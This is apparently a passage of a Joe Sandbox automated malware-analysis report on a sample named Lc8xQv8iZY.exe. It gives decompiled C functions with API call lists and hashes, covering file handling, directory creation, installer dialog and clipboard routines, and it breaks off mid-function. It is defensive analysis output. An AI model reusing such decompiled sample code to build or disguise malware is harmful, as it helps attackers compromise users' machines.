                                                  • Opcode Fuzzy Hash: 2602b990a6be508378c6e42cd022796474ee903161cb72c2cb5a68df28a06255
                                                  • Instruction Fuzzy Hash: 0EE086326441106AD621DA749D0496B72AC9E84740702487EF906F6191D7389C219A6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E004059D2(CHAR* _a4, long _a8, long _a12) {
                                                  				signed int _t5;
                                                  				void* _t6;
                                                  
                                                  				_t5 = GetFileAttributesA(_a4); // executed
                                                  				asm("sbb ecx, ecx");
                                                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                  				return _t6;
                                                  			}






                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(00000003,00402CCB,C:\Users\user\Desktop\Lc8xQv8iZY.exe,80000000,00000003), ref: 004059D6
                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059F8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                  • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                                                  • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                                                  • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405526(CHAR* _a4) {
                                                  				int _t2;
                                                  
                                                  				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				return 0;
                                                  			}





                                                  APIs
                                                  • CreateDirectoryA.KERNELBASE(?,00000000,00403242,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 0040552C
                                                  • GetLastError.KERNEL32 ref: 0040553A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                  • Instruction ID: ef4cf1633336d89bd9081ea15a94d355bc31ae876b4da9069c07bcdb8eac4916
                                                  • Opcode Fuzzy Hash: 62594c709cce2f5b8fb8ca5d54e7f3286412bfa0f130784d9dc04a2d264f0cc1
                                                  • Instruction Fuzzy Hash: 9DC08C30A08101BAD7100B30EE08B073AA5AB00340F104435A206E40F4D6349000CD3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004059B3(CHAR* _a4) {
                                                  				signed char _t3;
                                                  				int _t5;
                                                  
                                                  				_t3 = GetFileAttributesA(_a4); // executed
                                                  				if(_t3 != 0xffffffff) {
                                                  					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
                                                  					return _t5;
                                                  				}
                                                  				return _t3;
                                                  			}






                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,004057BE,?,?,?), ref: 004059B7
                                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 004059C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                  • Instruction ID: 1a2f65c413df3ce73f95872002610f1c5d23223b0cff369f14e5668d8f4fdbee
                                                  • Opcode Fuzzy Hash: 074f941138e9f1df105fff9ec0b177d36ae7deb3ea45ba36f2ce8c3e98632dd9
                                                  • Instruction Fuzzy Hash: 3CC04CF1818641ABD6015B34DF4D81F7F66EB50321B108B35F169A01F0CB315C66DA1A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004031D5(void* _a4, long _a8) {
                                                  				int _t6;
                                                  				long _t10;
                                                  
                                                  				_t10 = _a8;
                                                  				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
                                                  				if(_t6 == 0 || _a8 != _t10) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}






                                                  APIs
                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00413120,0040B120,004030DA,00413120,00004000,?,00000000,?,00402F64,00000004,00000000,00000000), ref: 004031EC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00403207(long _a4) {
                                                  				long _t2;
                                                  
                                                  				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
                                                  				return _t2;
                                                  			}





                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EB3,?), ref: 00403215
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405819(CHAR* _a4, intOrPtr _a8) {
                                                  				CHAR* _t3;
                                                  				char _t4;
                                                  
                                                  				_t3 = _a4;
                                                  				while(1) {
                                                  					_t4 =  *_t3;
                                                  					if(_t4 == 0) {
                                                  						break;
                                                  					}
                                                  					if(_t4 != _a8) {
                                                  						_t3 = CharNextA(_t3); // executed
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				return _t3;
                                                  			}






                                                  APIs
                                                  • CharNextA.USER32(?,0040333C,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",00409130), ref: 00405826
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: CharNext
                                                  • String ID:
                                                  • API String ID: 3213498283-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 95%
                                                  			E00405125(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                  				struct HWND__* _v8;
                                                  				long _v12;
                                                  				struct tagRECT _v28;
                                                  				void* _v36;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				int _v48;
                                                  				signed int _v52;
                                                  				int _v56;
                                                  				void* _v60;
                                                  				void* _v68;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t87;
                                                  				unsigned int _t92;
                                                  				int _t94;
                                                  				int _t95;
                                                  				void* _t101;
                                                  				intOrPtr _t123;
                                                  				struct HWND__* _t127;
                                                  				int _t149;
                                                  				int _t150;
                                                  				struct HWND__* _t154;
                                                  				struct HWND__* _t158;
                                                  				struct HMENU__* _t160;
                                                  				long _t162;
                                                  				void* _t163;
                                                  				short* _t164;
                                                  
                                                  				_t154 =  *0x423764;
                                                  				_t149 = 0;
                                                  				_v8 = _t154;
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 == 0x405) {
                                                  						CloseHandle(CreateThread(0, 0, E004050B9, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                  					}
                                                  					if(_a8 != 0x111) {
                                                  						L17:
                                                  						if(_a8 != 0x404) {
                                                  							L25:
                                                  							if(_a8 != 0x7b || _a12 != _t154) {
                                                  								goto L20;
                                                  							} else {
                                                  								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                  								_a8 = _t87;
                                                  								if(_t87 <= _t149) {
                                                  									L37:
                                                  									return 0;
                                                  								}
                                                  								_t160 = CreatePopupMenu();
                                                  								AppendMenuA(_t160, _t149, 1, E00405D1D(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                  								_t92 = _a16;
                                                  								if(_t92 != 0xffffffff) {
                                                  									_t150 = _t92;
                                                  									_t94 = _t92 >> 0x10;
                                                  								} else {
                                                  									GetWindowRect(_t154,  &_v28);
                                                  									_t150 = _v28.left;
                                                  									_t94 = _v28.top;
                                                  								}
                                                  								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                  								_t162 = 1;
                                                  								if(_t95 == 1) {
                                                  									_v60 = _t149;
                                                  									_v48 = 0x420580;
                                                  									_v44 = 0xfff;
                                                  									_a4 = _a8;
                                                  									do {
                                                  										_a4 = _a4 - 1;
                                                  										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
                                                  									} while (_a4 != _t149);
                                                  									OpenClipboard(_t149);
                                                  									EmptyClipboard();
                                                  									_t101 = GlobalAlloc(0x42, _t162);
                                                  									_a4 = _t101;
                                                  									_t163 = GlobalLock(_t101);
                                                  									do {
                                                  										_v48 = _t163;
                                                  										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                  										 *_t164 = 0xa0d;
                                                  										_t163 = _t164 + 2;
                                                  										_t149 = _t149 + 1;
                                                  									} while (_t149 < _a8);
                                                  									GlobalUnlock(_a4);
                                                  									SetClipboardData(1, _a4);
                                                  									CloseClipboard();
                                                  								}
                                                  								goto L37;
                                                  							}
                                                  						}
                                                  						if( *0x42374c == _t149) {
                                                  							ShowWindow( *0x423f88, 8);
                                                  							if( *0x42400c == _t149) {
                                                  								E00404FE7( *((intOrPtr*)( *0x41fd50 + 0x34)), _t149);
                                                  							}
                                                  							E00403F90(1);
                                                  							goto L25;
                                                  						}
                                                  						 *0x41f948 = 2;
                                                  						E00403F90(0x78);
                                                  						goto L20;
                                                  					} else {
                                                  						if(_a12 != 0x403) {
                                                  							L20:
                                                  							return E0040401E(_a8, _a12, _a16);
                                                  						}
                                                  						ShowWindow( *0x423750, _t149);
                                                  						ShowWindow(_t154, 8);
                                                  						E00403FEC(_t154);
                                                  						goto L17;
                                                  					}
                                                  				}
                                                  				_v52 = _v52 | 0xffffffff;
                                                  				_v40 = _v40 | 0xffffffff;
                                                  				_v60 = 2;
                                                  				_v56 = 0;
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t123 =  *0x423f90;
                                                  				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                  				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                  				 *0x423750 = GetDlgItem(_a4, 0x403);
                                                  				 *0x423748 = GetDlgItem(_a4, 0x3ee);
                                                  				_t127 = GetDlgItem(_a4, 0x3f8);
                                                  				 *0x423764 = _t127;
                                                  				_v8 = _t127;
                                                  				E00403FEC( *0x423750);
                                                  				 *0x423754 = E00404889(4);
                                                  				 *0x42376c = 0;
                                                  				GetClientRect(_v8,  &_v28);
                                                  				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                  				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                  				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                  				if(_a8 >= 0) {
                                                  					SendMessageA(_v8, 0x1001, 0, _a8);
                                                  					SendMessageA(_v8, 0x1026, 0, _a8);
                                                  				}
                                                  				if(_a12 >= _t149) {
                                                  					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                  				}
                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                  				_push(0x1b);
                                                  				E00403FB7(_a4);
                                                  				if(( *0x423f98 & 0x00000003) != 0) {
                                                  					ShowWindow( *0x423750, _t149);
                                                  					if(( *0x423f98 & 0x00000002) != 0) {
                                                  						 *0x423750 = _t149;
                                                  					} else {
                                                  						ShowWindow(_v8, 8);
                                                  					}
                                                  					E00403FEC( *0x423748);
                                                  				}
                                                  				_t158 = GetDlgItem(_a4, 0x3ec);
                                                  				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                  				if(( *0x423f98 & 0x00000004) != 0) {
                                                  					SendMessageA(_t158, 0x409, _t149, _a12);
                                                  					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                  				}
                                                  				goto L37;
                                                  			}

































                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405184
                                                  • GetDlgItem.USER32 ref: 00405193
                                                  • GetClientRect.USER32 ref: 004051D0
                                                  • GetSystemMetrics.USER32 ref: 004051D8
                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051F9
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040520A
                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 0040521D
                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 0040522B
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040523E
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405260
                                                  • ShowWindow.USER32(?,00000008), ref: 00405274
                                                  • GetDlgItem.USER32 ref: 00405295
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004052A5
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052BE
                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 004052CA
                                                  • GetDlgItem.USER32 ref: 004051A2
                                                    • Part of subcall function 00403FEC: SendMessageA.USER32(00000028,?,00000001,00403E1D), ref: 00403FFA
                                                  • GetDlgItem.USER32 ref: 004052E7
                                                  • CreateThread.KERNEL32 ref: 004052F5
                                                  • CloseHandle.KERNEL32(00000000), ref: 004052FC
                                                  • ShowWindow.USER32(00000000), ref: 00405320
                                                  • ShowWindow.USER32(?,00000008), ref: 00405325
                                                  • ShowWindow.USER32(00000008), ref: 0040536C
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040539E
                                                  • CreatePopupMenu.USER32 ref: 004053AF
                                                  • AppendMenuA.USER32 ref: 004053C4
                                                  • GetWindowRect.USER32 ref: 004053D7
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053FB
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405436
                                                  • OpenClipboard.USER32(00000000), ref: 00405446
                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040544C
                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405455
                                                  • GlobalLock.KERNEL32 ref: 0040545F
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405473
                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040548B
                                                  • SetClipboardData.USER32 ref: 00405496
                                                  • CloseClipboard.USER32 ref: 0040549C
                                                  Strings
                                                  Memory Dump Source
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 97%
                                                  			E00404936(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
                                                  				struct HWND__* _v8;
                                                  				struct HWND__* _v12;
                                                  				signed int _v16;
                                                  				intOrPtr _v20;
                                                  				void* _v24;
                                                  				long _v28;
                                                  				int _v32;
                                                  				signed int _v40;
                                                  				int _v44;
                                                  				signed int* _v56;
                                                  				intOrPtr _v60;
                                                  				signed int _v64;
                                                  				long _v68;
                                                  				void* _v72;
                                                  				intOrPtr _v76;
                                                  				intOrPtr _v80;
                                                  				void* _v84;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				struct HWND__* _t182;
                                                  				int _t196;
                                                  				long _t202;
                                                  				signed int _t206;
                                                  				signed int _t217;
                                                  				void* _t220;
                                                  				void* _t221;
                                                  				int _t227;
                                                  				signed int _t232;
                                                  				signed int _t233;
                                                  				signed int _t240;
                                                  				struct HBITMAP__* _t250;
                                                  				void* _t252;
                                                  				char* _t268;
                                                  				signed char _t269;
                                                  				long _t274;
                                                  				int _t280;
                                                  				signed int* _t281;
                                                  				int _t282;
                                                  				long _t283;
                                                  				int _t285;
                                                  				long _t286;
                                                  				signed int _t287;
                                                  				long _t288;
                                                  				signed int _t291;
                                                  				signed int _t298;
                                                  				signed int _t300;
                                                  				signed int _t302;
                                                  				int* _t310;
                                                  				void* _t311;
                                                  				int _t315;
                                                  				int _t316;
                                                  				int _t317;
                                                  				signed int _t318;
                                                  				void* _t320;
                                                  
                                                  				_v12 = GetDlgItem(_a4, 0x3f9);
                                                  				_t182 = GetDlgItem(_a4, 0x408);
                                                  				_t280 =  *0x423fa8;
                                                  				_t320 = SendMessageA;
                                                  				_v8 = _t182;
                                                  				_t315 = 0;
                                                  				_v32 = _t280;
                                                  				_v20 =  *0x423f90 + 0x94;
                                                  				if(_a8 != 0x110) {
                                                  					L23:
                                                  					if(_a8 != 0x405) {
                                                  						_t289 = _a16;
                                                  					} else {
                                                  						_a12 = _t315;
                                                  						_t289 = 1;
                                                  						_a8 = 0x40f;
                                                  						_a16 = 1;
                                                  					}
                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                  						_v16 = _t289;
                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
                                                  							if(( *0x423f99 & 0x00000002) != 0) {
                                                  								L41:
                                                  								if(_v16 != _t315) {
                                                  									_t232 = _v16;
                                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
                                                  										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
                                                  									}
                                                  									_t233 = _v16;
                                                  									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
                                                  										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
                                                  										} else {
                                                  											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
                                                  										}
                                                  									}
                                                  								}
                                                  								goto L48;
                                                  							}
                                                  							if(_a8 == 0x413) {
                                                  								L33:
                                                  								_t289 = 0 | _a8 != 0x00000413;
                                                  								_t240 = E004048B6(_v8, _a8 != 0x413);
                                                  								if(_t240 >= _t315) {
                                                  									_t93 = _t280 + 8; // 0x8
                                                  									_t310 = _t240 * 0x418 + _t93;
                                                  									_t289 =  *_t310;
                                                  									if((_t289 & 0x00000010) == 0) {
                                                  										if((_t289 & 0x00000040) == 0) {
                                                  											_t298 = _t289 ^ 0x00000001;
                                                  										} else {
                                                  											_t300 = _t289 ^ 0x00000080;
                                                  											if(_t300 >= 0) {
                                                  												_t298 = _t300 & 0xfffffffe;
                                                  											} else {
                                                  												_t298 = _t300 | 0x00000001;
                                                  											}
                                                  										}
                                                  										 *_t310 = _t298;
                                                  										E0040117D(_t240);
                                                  										_t289 = 1;
                                                  										_a8 = 0x40f;
                                                  										_a12 = 1;
                                                  										_a16 =  !( *0x423f98) >> 0x00000008 & 1;
                                                  									}
                                                  								}
                                                  								goto L41;
                                                  							}
                                                  							_t289 = _a16;
                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                  								goto L41;
                                                  							}
                                                  							goto L33;
                                                  						} else {
                                                  							goto L48;
                                                  						}
                                                  					} else {
                                                  						L48:
                                                  						if(_a8 != 0x111) {
                                                  							L56:
                                                  							if(_a8 == 0x200) {
                                                  								SendMessageA(_v8, 0x200, _t315, _t315);
                                                  							}
                                                  							if(_a8 == 0x40b) {
                                                  								_t220 =  *0x42055c;
                                                  								if(_t220 != _t315) {
                                                  									ImageList_Destroy(_t220);
                                                  								}
                                                  								_t221 =  *0x420574;
                                                  								if(_t221 != _t315) {
                                                  									GlobalFree(_t221);
                                                  								}
                                                  								 *0x42055c = _t315;
                                                  								 *0x420574 = _t315;
                                                  								 *0x423fe0 = _t315;
                                                  							}
                                                  							if(_a8 != 0x40f) {
                                                  								L86:
                                                  								if(_a8 == 0x420 && ( *0x423f99 & 0x00000001) != 0) {
                                                  									_t316 = (0 | _a16 == 0x00000020) << 3;
                                                  									ShowWindow(_v8, _t316);
                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
                                                  								}
                                                  								goto L89;
                                                  							} else {
                                                  								E004011EF(_t289, _t315, _t315);
                                                  								if(_a12 != _t315) {
                                                  									E0040140B(8);
                                                  								}
                                                  								if(_a16 == _t315) {
                                                  									L73:
                                                  									E004011EF(_t289, _t315, _t315);
                                                  									_v32 =  *0x420574;
                                                  									_t196 =  *0x423fa8;
                                                  									_v60 = 0xf030;
                                                  									_v16 = _t315;
                                                  									if( *0x423fac <= _t315) {
                                                  										L84:
                                                  										InvalidateRect(_v8, _t315, 1);
                                                  										if( *((intOrPtr*)( *0x42375c + 0x10)) != _t315) {
                                                  											E00404871(0x3ff, 0xfffffffb, E00404889(5));
                                                  										}
                                                  										goto L86;
                                                  									}
                                                  									_t281 = _t196 + 8;
                                                  									do {
                                                  										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
                                                  										if(_t202 != _t315) {
                                                  											_t291 =  *_t281;
                                                  											_v68 = _t202;
                                                  											_v72 = 8;
                                                  											if((_t291 & 0x00000001) != 0) {
                                                  												_v72 = 9;
                                                  												_v56 =  &(_t281[4]);
                                                  												_t281[0] = _t281[0] & 0x000000fe;
                                                  											}
                                                  											if((_t291 & 0x00000040) == 0) {
                                                  												_t206 = (_t291 & 0x00000001) + 1;
                                                  												if((_t291 & 0x00000010) != 0) {
                                                  													_t206 = _t206 + 3;
                                                  												}
                                                  											} else {
                                                  												_t206 = 3;
                                                  											}
                                                  											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
                                                  											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                  											SendMessageA(_v8, 0x110d, _t315,  &_v72);
                                                  										}
                                                  										_v16 = _v16 + 1;
                                                  										_t281 =  &(_t281[0x106]);
                                                  									} while (_v16 <  *0x423fac);
                                                  									goto L84;
                                                  								} else {
                                                  									_t282 = E004012E2( *0x420574);
                                                  									E00401299(_t282);
                                                  									_t217 = 0;
                                                  									_t289 = 0;
                                                  									if(_t282 <= _t315) {
                                                  										L72:
                                                  										SendMessageA(_v12, 0x14e, _t289, _t315);
                                                  										_a16 = _t282;
                                                  										_a8 = 0x420;
                                                  										goto L73;
                                                  									} else {
                                                  										goto L69;
                                                  									}
                                                  									do {
                                                  										L69:
                                                  										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
                                                  											_t289 = _t289 + 1;
                                                  										}
                                                  										_t217 = _t217 + 1;
                                                  									} while (_t217 < _t282);
                                                  									goto L72;
                                                  								}
                                                  							}
                                                  						}
                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                  							goto L89;
                                                  						} else {
                                                  							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
                                                  							if(_t227 == 0xffffffff) {
                                                  								goto L89;
                                                  							}
                                                  							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
                                                  							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
                                                  								_t283 = 0x20;
                                                  							}
                                                  							E00401299(_t283);
                                                  							SendMessageA(_a4, 0x420, _t315, _t283);
                                                  							_a12 = 1;
                                                  							_a16 = _t315;
                                                  							_a8 = 0x40f;
                                                  							goto L56;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					 *0x423fe0 = _a4;
                                                  					_t285 = 2;
                                                  					_v28 = 0;
                                                  					_v16 = _t285;
                                                  					 *0x420574 = GlobalAlloc(0x40,  *0x423fac << 2);
                                                  					_t250 = LoadBitmapA( *0x423f80, 0x6e);
                                                  					 *0x420568 =  *0x420568 | 0xffffffff;
                                                  					_v24 = _t250;
                                                  					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
                                                  					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                  					 *0x42055c = _t252;
                                                  					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                                  					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
                                                  					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                                  						SendMessageA(_v8, 0x111b, 0x10, 0);
                                                  					}
                                                  					DeleteObject(_v24);
                                                  					_t286 = 0;
                                                  					do {
                                                  						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                                  						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                                  							if(_t286 != 0x20) {
                                                  								_v16 = _t315;
                                                  							}
                                                  							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
                                                  						}
                                                  						_t286 = _t286 + 1;
                                                  					} while (_t286 < 0x21);
                                                  					_t317 = _a16;
                                                  					_t287 = _v16;
                                                  					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                                  					_push(0x15);
                                                  					E00403FB7(_a4);
                                                  					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                                  					_push(0x16);
                                                  					E00403FB7(_a4);
                                                  					_t318 = 0;
                                                  					_t288 = 0;
                                                  					if( *0x423fac <= 0) {
                                                  						L19:
                                                  						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                                  						goto L20;
                                                  					} else {
                                                  						_t311 = _v32 + 8;
                                                  						_v24 = _t311;
                                                  						do {
                                                  							_t268 = _t311 + 0x10;
                                                  							if( *_t268 != 0) {
                                                  								_v60 = _t268;
                                                  								_t269 =  *_t311;
                                                  								_t302 = 0x20;
                                                  								_v84 = _t288;
                                                  								_v80 = 0xffff0002;
                                                  								_v76 = 0xd;
                                                  								_v64 = _t302;
                                                  								_v40 = _t318;
                                                  								_v68 = _t269 & _t302;
                                                  								if((_t269 & 0x00000002) == 0) {
                                                  									if((_t269 & 0x00000004) == 0) {
                                                  										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                  									} else {
                                                  										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                                  									}
                                                  								} else {
                                                  									_v76 = 0x4d;
                                                  									_v44 = 1;
                                                  									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                                  									_v28 = 1;
                                                  									 *( *0x420574 + _t318 * 4) = _t274;
                                                  									_t288 =  *( *0x420574 + _t318 * 4);
                                                  								}
                                                  							}
                                                  							_t318 = _t318 + 1;
                                                  							_t311 = _v24 + 0x418;
                                                  							_v24 = _t311;
                                                  						} while (_t318 <  *0x423fac);
                                                  						if(_v28 != 0) {
                                                  							L20:
                                                  							if(_v16 != 0) {
                                                  								E00403FEC(_v8);
                                                  								_t280 = _v32;
                                                  								_t315 = 0;
